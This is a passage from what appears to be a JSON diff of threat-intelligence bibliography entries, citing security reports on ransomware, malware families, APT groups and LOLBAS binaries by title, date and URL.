"1c62ed57-43f7-40d7-a5c9-46b40a40af0e", + "value": "tau bundlore erika noerenberg 2020" + }, + { + "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.", + "meta": { + "date_accessed": "2021-02-17T00:00:00Z", + "date_published": "2020-07-08T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" + ], + "source": "MITRE", + "title": "TAU Threat Discovery: Conti Ransomware" + }, + "related": [], + "uuid": "3c3a6dc0-66f2-492e-8c9c-c0bcca73008e", + "value": "CarbonBlack Conti July 2020" + }, + { + "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-03-22T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + ], + "source": "MITRE", + "title": "TAU Threat Intelligence Notification – LockerGoga Ransomware" + }, + "related": [], + "uuid": "9970063c-6df7-4638-a247-6b1102289372", + "value": "CarbonBlack LockerGoga 2019" + }, + { + "description": "TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2016-02-04T00:00:00Z", + "refs": [ + "https://github.com/hfiref0x/TDL" + ], + "source": "MITRE", + "title": "TDL (Turla Driver Loader)" + }, + "related": [], + "uuid": "ed3534be-06ce-487b-911d-abe2fba70210", + "value": "GitHub Turla Driver Loader" + }, + { + "description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2016-04-21T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/" + ], + "source": "MITRE", + "title": "Teaching an old RAT new tricks" + }, + "related": [], + "uuid": "20ef3645-fb92-4e13-a5a8-99367869bcba", + "value": "S1 Old Rat New Tricks" + }, + { + "description": "LOLBAS. (2022, January 17). Teams.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/" + ], + "source": "Tidal Cyber", + "title": "Teams.exe" + }, + "related": [], + "uuid": "ceee2b13-331f-4019-9c27-af0ce8b25414", + "value": "Teams.exe - LOLBAS Project" + }, + { + "description": "Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.", + "meta": { + "date_accessed": "2022-02-08T00:00:00Z", + "date_published": "2021-06-04T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments" + ], + "source": "MITRE", + "title": "TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations" + }, + "related": [], + "uuid": "a672b74f-1f04-4d3a-84a6-1dd50e1a9951", + "value": "TeamTNT Cloud Enumeration" + }, + { + "description": "Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.", + "meta": { + "date_accessed": "2021-10-15T00:00:00Z", + "date_published": "2021-09-01T00:00:00Z", + "refs": [ + "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf" + ], + "source": "MITRE", + "title": "TeamTNT Cryptomining Explosion" + }, + "related": [], + "uuid": "e0d6208b-a4d6-45f0-bb3a-6c8681630b55", + "value": "Intezer TeamTNT Explosion September 2021" + }, + { + "description": "Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.", + "meta": { + "date_accessed": "2022-08-04T00:00:00Z", + "date_published": "2022-04-21T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/" + ], + "source": "MITRE", + "title": "TeamTNT targeting AWS, Alibaba" + }, + "related": [], + "uuid": "f39b5f92-6e14-4c7f-b79d-7bade722e6d9", + "value": "Cisco Talos Intelligence Group" + }, + { + "description": "Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved July 8, 2022.", + "meta": { + "date_accessed": "2022-07-08T00:00:00Z", + "date_published": "2022-04-21T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html" + ], + "source": "MITRE", + "title": "TeamTNT targeting AWS, Alibaba" + }, + "related": [], + "uuid": "acd1b4c5-da28-584e-b892-599180a8dbb0", + "value": "Talos TeamTNT" + }, + { + "description": "Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2020-08-16T00:00:00Z", + "refs": [ + "https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/" + ], + "source": "MITRE", + "title": "Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials" + }, + "related": [], + "uuid": "8ccab4fe-155d-44b0-b0f2-941e9f8f87db", + "value": "Cado Security TeamTNT Worm August 2020" + }, + { + "description": "AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-09-08T00:00:00Z", + "refs": [ + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera" + ], + "source": "MITRE", + "title": "TeamTNT with new campaign aka Chimaera" + }, + "related": [], + "uuid": "5d9f402f-4ff4-4993-8685-e5656e2f3aff", + "value": "ATT TeamTNT Chimaera September 2020" + }, + { + "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.", + "meta": { + "date_accessed": "2019-08-08T00:00:00Z", + "date_published": "2018-02-17T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x2A.html" + ], + "source": "MITRE", + "title": "Tearing Apart the Undetected (OSX)Coldroot RAT" + }, + "related": [], + "uuid": "5ee3a92c-df33-4ecd-b21e-7b9a4f6de227", + "value": "OSX Coldroot RAT" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "refs": [ + "https://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf" + ], + "source": "MITRE", + "title": "Technical Analysis" + }, + "related": [], + "uuid": "1664726e-3a79-4d90-86e0-b2d50e9e0ba2", + "value": "Kaspersky ProjectSauron Technical Analysis" + }, + { + "description": "Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.", + "meta": { + "date_accessed": "2021-08-11T00:00:00Z", + "date_published": "2021-02-01T00:00:00Z", + "refs": [ + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf" + ], + "source": "MITRE", + "title": "Technical Analysis of Babuk Ransomware" + }, + "related": [], + "uuid": "bb23ca19-78bb-4406-90a4-bf82bd467e04", + "value": "McAfee Babuk February 2021" + }, + { + "description": "Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.", + "meta": { + "date_accessed": "2021-06-18T00:00:00Z", + "date_published": "2021-04-01T00:00:00Z", + "refs": [ + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf" + ], + "source": "MITRE", + "title": "Technical Analysis of Cuba Ransomware" + }, + "related": [], + "uuid": "e0e86e08-64ec-48dc-91e6-24fde989cd77", + "value": "McAfee Cuba April 2021" + }, + { + "description": "Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2021-03-16T00:00:00Z", + "refs": [ + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf" + ], + "source": "MITRE", + "title": "Technical Analysis of Operation Dianxun" + }, + "related": [], + "uuid": "a40a69d7-7abc-4829-9905-98c156a809fe", + "value": "McAfee Dianxun March 2021" + }, + { + "description": "Brett Stone-Gross, Nikolaos Pantazopoulos. (2023, May 24). Technical Analysis of Pikabot. Retrieved January 11, 2024.", + "meta": { + "date_accessed": "2024-01-11T00:00:00Z", + "date_published": "2023-05-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot" + ], + "source": "Tidal Cyber", + "title": "Technical Analysis of Pikabot" + }, + "related": [], + "uuid": "ec87676b-bc88-44b5-9e9a-5eb8eb39b4a1", + "value": "Zscaler Pikabot May 24 2023" + }, + { + "description": "Crowdstrike. (2022, January 19). Technical Analysis of the WhisperGate Malicious Bootloader. Retrieved March 10, 2022.", + "meta": { + "date_accessed": "2022-03-10T00:00:00Z", + "date_published": "2022-01-19T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware" + ], + "source": "MITRE", + "title": "Technical Analysis of the WhisperGate Malicious Bootloader" + }, + "related": [], + "uuid": "846bccb4-b177-4c17-8cc5-56769c1d4b60", + "value": "Crowdstrike WhisperGate January 2022" + }, + { + "description": "Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020.", + "meta": { + "date_accessed": "2020-06-30T00:00:00Z", + "date_published": "2018-04-19T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/technotes/tn2459/_index.html" + ], + "source": "MITRE", + "title": "Technical Note TN2459: User-Approved Kernel Extension Loading" + }, + "related": [], + "uuid": "8cd7676a-bbef-4c31-8288-365837acf65d", + "value": "Apple TN2459 Kernel Extensions" + }, + { + "description": "GovCERT. (2016, May 23). Technical Report about the Espionage Case at RUAG. Retrieved November 7, 2018.", + "meta": { + "date_accessed": "2018-11-07T00:00:00Z", + "date_published": "2016-05-23T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20170718174931/https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf" + ], + "source": "MITRE", + "title": "Technical Report about the Espionage Case at RUAG" + }, + "related": [], + "uuid": "2e4a445f-b55c-4800-9d75-9d8fe20abc74", + "value": "GovCERT Carbon May 2016" + }, + { + "description": "Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2016-07-20T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/" + ], + "source": "MITRE", + "title": "Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks" + }, + "related": [], + "uuid": "3138f32c-f89c-439c-a8c5-2964c356308d", + "value": "Palo Alto Office Test Sofacy" + }, + { + "description": "LOLBAS. (2018, May 25). te.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/" + ], + "source": "Tidal Cyber", + "title": "te.exe" + }, + "related": [], + "uuid": "e7329381-319e-4dcc-8187-92882e6f2e12", + "value": "te.exe - LOLBAS Project" + }, + { + "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.", + "meta": { + "date_accessed": "2020-06-11T00:00:00Z", + "date_published": "2017-06-30T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/" + ], + "source": "MITRE", + "title": "TeleBots are back: Supply chain attacks against Ukraine" + }, + "related": [], + "uuid": "eb5c2951-b149-4e40-bc5f-b2630213eb8b", + "value": "ESET Telebots June 2017" + }, + { + "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.", + "meta": { + "date_accessed": "2019-04-10T00:00:00Z", + "date_published": "2018-11-07T00:00:00Z", + "refs": [ + "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780" + ], + "source": "MITRE", + "title": "Template Injection Attacks - Bypassing Security Controls by Living off the Land" + }, + "related": [], + "uuid": "8c010c87-865b-4168-87a7-4a24db413def", + "value": "SANS Brian Wiltse Template Injection" + }, + { + "description": "Amazon. (n.d.). Temporary Security Credentials. Retrieved October 18, 2019.", + "meta": { + "date_accessed": "2019-10-18T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html" + ], + "source": "MITRE", + "title": "Temporary Security Credentials" + }, + "related": [], + "uuid": "d3740d23-1561-47c4-a6e5-df1b6277839e", + "value": "Amazon AWS Temporary Security Credentials" + }, + { + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "meta": { + "date_accessed": "2017-12-07T00:00:00Z", + "date_published": "2017-07-18T00:00:00Z", + "refs": [ + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "source": "MITRE", + "title": "Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques" + }, + "related": [], + "uuid": "02c9100d-27eb-4f2f-b302-adf890055546", + "value": "Elastic Process Injection July 2017" + }, + { + "description": "LOLBAS. (2023, August 21). TestWindowRemoteAgent.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-08-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Testwindowremoteagent/" + ], + "source": "Tidal Cyber", + "title": "TestWindowRemoteAgent.exe" + }, + "related": [], + "uuid": "0cc891bc-692c-4a52-9985-39ddb434294d", + "value": "TestWindowRemoteAgent.exe - LOLBAS Project" + }, + { + "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.", + "meta": { + "date_accessed": "2023-02-09T00:00:00Z", + "date_published": "2022-01-05T00:00:00Z", + "refs": [ + "https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d" + ], + "source": "MITRE", + "title": "TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION" + }, + "related": [], + "uuid": "932897a6-0fa4-5be3-bf0b-20d6ddad238e", + "value": "Sygnia Elephant Beetle Jan 2022" + }, + { + "description": "Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.", + "meta": { + "date_accessed": "2019-09-20T00:00:00Z", + "date_published": "2018-11-13T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/" + ], + "source": "MITRE", + "title": "That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards" + }, + "related": [], + "uuid": "30ab5d35-db9b-401f-89cb-73f2c7fea060", + "value": "Domain_Steal_CC" + }, + { + "description": "Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.", + "meta": { + "date_accessed": "2017-11-02T00:00:00Z", + "date_published": "2014-02-18T00:00:00Z", + "refs": [ + "https://tools.kali.org/password-attacks/hydra" + ], + "source": "MITRE", + "title": "THC-Hydra" + }, + "related": [], + "uuid": "d8c93272-00f8-4dc4-b4cd-03246fc0fc23", + "value": "Kali Hydra" + }, + { + "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", + "meta": { + "date_accessed": "2016-04-27T00:00:00Z", + "refs": [ + "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" + ], + "source": "MITRE", + "title": "The Adventures of a Keystroke: An in-depth look into keyloggers on Windows" + }, + "related": [], + "uuid": "f29ed400-2986-4b2c-9b8a-7dde37562d22", + "value": "Adventures of a Keystroke" + }, + { + "description": "ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.", + "meta": { + "date_accessed": "2016-01-26T00:00:00Z", + "date_published": "2015-02-27T00:00:00Z", + "refs": [ + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Anthem Hack: All Roads Lead to China" + }, + "related": [], + "uuid": "61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec", + "value": "ThreatConnect Anthem" + }, + { + "description": "Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.", + "meta": { + "date_accessed": "2021-04-06T00:00:00Z", + "date_published": "2020-09-21T00:00:00Z", + "refs": [ + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf" + ], + "source": "MITRE", + "title": "The Art and Science of Detecting Cobalt Strike" + }, + "related": [], + "uuid": "60a5ee63-3d98-466a-8037-4a1edfcdef8c", + "value": "Talos Cobalt Strike September 2020" + }, + { + "description": "Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.", + "meta": { + "date_accessed": "2022-04-19T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" + ], + "source": "MITRE", + "title": "The Art of Mac Malware Volume 0x1:Analysis" + }, + "related": [], + "uuid": "3684bacb-24cb-4467-b463-d0d3f5075c5c", + "value": "wardle chp2 persistence" + }, + { + "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", + "meta": { + "date_accessed": "2021-03-19T00:00:00Z", + "date_published": "2020-08-05T00:00:00Z", + "refs": [ + "https://taomm.org/vol1/pdfs.html" + ], + "source": "MITRE", + "title": "The Art of Mac Malware Volume 0x1: Analysis" + }, + "related": [], + "uuid": "53d0279e-4f30-4bbe-a9c7-90e36cd81570", + "value": "wardle artofmalware volume1" + }, + { + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2014-07-01T00:00:00Z", + "refs": [ + "" + ], + "source": "MITRE", + "title": "The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory" + }, + "related": [], + "uuid": "054404b7-48a6-4578-9828-9f1e8e21d2df", + "value": "ArtOfMemoryForensics" + }, + { + "description": "Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2016-12-20T00:00:00Z", + "refs": [ + "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" + ], + "source": "MITRE", + "title": "The audit system must be configured to audit the loading and unloading of dynamic kernel modules." + }, + "related": [], + "uuid": "44c10623-557f-445d-8b88-6006af13c54d", + "value": "STIG Audit Kernel Modules" + }, + { + "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2020-04-03T00:00:00Z", + "refs": [ + "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" + ], + "source": "MITRE", + "title": "The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable" + }, + "related": [], + "uuid": "356defac-b976-41c1-aac8-5d6ff0c80e28", + "value": "Medium Metamorfo Apr 2020" + }, + { + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "meta": { + "date_accessed": "2021-12-06T00:00:00Z", + "date_published": "2021-10-01T00:00:00Z", + "refs": [ + "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + ], + "source": "MITRE", + "title": "THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE" + }, + "related": [], + "uuid": "06b6cbe3-8e35-4594-b36f-76b503c11520", + "value": "Gigamon Berserk Bear October 2021" + }, + { + "description": "Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2015-04-09T00:00:00Z", + "refs": [ + "https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/" + ], + "source": "MITRE", + "title": "The Banking Trojan Emotet: Detailed Analysis" + }, + "related": [], + "uuid": "4824dfdf-8dbb-4b98-afcc-4a703c31fbda", + "value": "Kaspersky Emotet Jan 2019" + }, + { + "description": "DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.", + "meta": { + "date_accessed": "2016-01-26T00:00:00Z", + "date_published": "2015-08-06T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Black Vine cyberespionage group" + }, + "related": [], + "uuid": "0b7745ce-04c0-41d9-a440-df9084a45d09", + "value": "Symantec Black Vine" + }, + { + "description": "Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.", + "meta": { + "date_accessed": "2021-07-16T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer" + ], + "source": "MITRE", + "title": "THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK" + }, + "related": [], + "uuid": "6b0dd676-3ea5-4b56-a27b-b1685787de02", + "value": "Group IB GrimAgent July 2021" + }, + { + "description": "RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020.", + "meta": { + "date_accessed": "2020-07-29T00:00:00Z", + "date_published": "2017-11-21T00:00:00Z", + "refs": [ + "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf" + ], + "source": "MITRE", + "title": "THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT" + }, + "related": [], + "uuid": "eb947d49-26f4-4104-8296-1552a273c9c3", + "value": "RSA Carbanak November 2017" + }, + { + "description": "Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-12-21T00:00:00Z", + "refs": [ + "https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html" + ], + "source": "MITRE", + "title": "The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc" + }, + "related": [], + "uuid": "d7594fb4-e544-491b-a406-228a5c7884a9", + "value": "Picus Emotet Dec 2018" + }, + { + "description": "Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022.", + "meta": { + "date_accessed": "2022-09-02T00:00:00Z", + "date_published": "2022-04-27T00:00:00Z", + "refs": [ + "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056" + ], + "source": "MITRE", + "title": "The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection" + }, + "related": [], + "uuid": "5f6752a7-50a9-4202-b69b-c5f9d24b86de", + "value": "Medium Ali Salem Bumblebee April 2022" + }, + { + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "meta": { + "date_accessed": "2016-07-26T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/ms679687.aspx" + ], + "source": "MITRE", + "title": "The COM Elevation Moniker" + }, + "related": [], + "uuid": "898df7c7-4f19-40cb-a216-7b0f6c6155b3", + "value": "MSDN COM Elevation" + }, + { + "description": "Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.", + "meta": { + "date_accessed": "2016-08-18T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms694363.aspx" + ], + "source": "MITRE", + "title": "The Component Object Model" + }, + "related": [], + "uuid": "e1bb3872-7748-4e64-818f-6187a20d59f0", + "value": "Microsoft Component Object Model" + }, + { + "description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.", + "meta": { + "date_accessed": "2021-02-18T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm" + ], + "source": "MITRE", + "title": "The Conficker Worm" + }, + "related": [], + "uuid": "2dca2274-5f25-475a-b87d-97f3e3a525de", + "value": "SANS Conficker" + }, + { + "description": "Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.", + "meta": { + "date_accessed": "2019-04-24T00:00:00Z", + "date_published": "2014-10-21T00:00:00Z", + "refs": [ + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf" + ], + "source": "MITRE", + "title": "The continued rise of DDoS attacks" + }, + "related": [], + "uuid": "878e0382-4191-4bca-8adc-c379b0d57ba8", + "value": "Symantec DDoS October 2014" + }, + { + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.", + "meta": { + "date_accessed": "2021-05-24T00:00:00Z", + "date_published": "2020-11-12T00:00:00Z", + "refs": [ + "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + ], + "source": "MITRE", + "title": "The CostaRicto Campaign: Cyber-Espionage Outsourced" + }, + "related": [], + "uuid": "93a23447-641c-4ee2-9fbd-64b2adea8a5f", + "value": "BlackBerry CostaRicto November 2020" + }, + { + "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.", + "meta": { + "date_accessed": "2018-02-26T00:00:00Z", + "date_published": "2017-07-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/the-curious-case-of-mia-ash" + ], + "source": "MITRE", + "title": "The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets" + }, + "related": [], + "uuid": "754c9276-ef05-4d05-956f-75866090aa78", + "value": "SecureWorks Mia Ash July 2017" + }, + { + "description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2013-12-09T00:00:00Z", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/" + ], + "source": "MITRE", + "title": "The Curious Case of the Malicious IIS Module" + }, + "related": [], + "uuid": "cbb79c3c-1e2c-42ac-8183-9566ccde0cd6", + "value": "Trustwave IIS Module 2013" + }, + { + "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-06-08T00:00:00Z", + "refs": [ + "https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc" + ], + "source": "MITRE", + "title": "The Danger of Unused AWS Regions" + }, + "related": [], + "uuid": "7c237b73-233f-4fe3-b4a6-ce523fd82853", + "value": "CloudSploit - Unused AWS Regions" + }, + { + "description": "Dormann, W. (2019, September 4). The Dangers of VHD and VHDX Files. Retrieved March 16, 2021.", + "meta": { + "date_accessed": "2021-03-16T00:00:00Z", + "date_published": "2019-09-04T00:00:00Z", + "refs": [ + "https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html" + ], + "source": "MITRE", + "title": "The Dangers of VHD and VHDX Files" + }, + "related": [], + "uuid": "e58b4e78-d858-4b28-8d06-2fb467b26337", + "value": "Dormann Dangers of VHD 2019" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-11-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Darkhotel APT A Story of Unusual 